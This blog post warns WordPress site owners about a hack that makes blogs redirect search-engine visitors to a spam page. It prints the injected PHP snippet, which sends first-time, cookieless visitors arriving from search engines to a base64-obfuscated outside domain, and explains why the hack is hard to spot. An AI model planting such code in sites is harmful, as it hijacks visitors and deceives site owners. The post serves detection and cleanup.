WordPress Redirect h4x’s

Lately I have noticed some peoples blogs had been redirecting to some spammy landing page when you goto them from Google. I notified them about it and they thought I was nuts… cause they could not reproduce it.

Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for.

Donncha also has pinpointed the redirect and cookie hack which is very difficult to detect but what I have suspected has been going on:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

The code above basically redirects people from your website to their choice if:

1) they are coming from a search engine or other big referral site.
2) they have never visited your site before (no cookies are set).

Its pretty slick and very hard to detect since only NEW visitors would be effected.

Make sure you check all of your blogs for that code. (in header.php)

About The Author

Comments 67

  1. Jeff - buzzmyblog.com
  2. ShoeMoney
  3. Jeff - buzzmyblog.com
  4. ShoeMoney
  5. Donncha O Caoimh
  6. ShoeMoney
  7. Tyler Ingram
  8. CPA Affiliates
  9. Jonathan Volk
  10. Jonathan Volk
  11. ShoeMoney
  12. Sports Picks
  13. Paul
  14. Michael D
  15. Steve McGrath
  16. Apoorv
  17. Website Reveiws
  18. Aaron Kronis
  19. it gossips
  20. Merlin
  21. Sports Picks
  22. Melvin
  23. Merlin
  24. Merlin
  25. Sports Picks
  26. Joe Money
  27. Text Lingo
  28. Monica Livingstone
  29. team ray
  30. ShoeMoney
  31. ShoeMoney
  32. Gav
  33. Ken Nickless
  34. Terry Tay
  35. Terry Tay
  36. Best Videos
  37. Melvin
  38. Kevin
  39. Jacky Supit
  40. purposeinc
  41. Bob
  42. Georgia
  43. Tim Linden
  44. Graham Langdon
  45. Graham Langdon
  46. Not John Chow
  47. Samir
  48. forumistan
  49. Start Blogging
  50. Binary Ant
  51. PPC
  52. PPC
  53. Web Marketeer
  54. Web Marketeer
  55. Krayzie
  56. Bonignidgiday
  57. hermes handbags
  58. birthday party supplies
  59. Shemika Haislett
  60. apb aimbot
  61. Ewa Malay
  62. Maximum Leverage
  63. Internet Marketing
  64. christian louboutin sale
Weapons Of Marketing
My Legal Issues & Downloadable Resources
ACT Affiliate Marketing Method & Download
FaceBook Ninja Marketing Presentation
Interviewing Darren Rowse Of Problogger
Sarah East From PopCrunch – *NSFW* – Most Awkward Interview Ever
I Spill it All To Andrew Warner
Interviewing Penn Jillette @ TC 50
How To Be Successful Making Money Online (keynote)
NamesCon Keynote Talk (Domain Name Focused)
Affiliate Summit 2012 Closing Keynote With Slides
FaceBook Ninja Marketing Presentation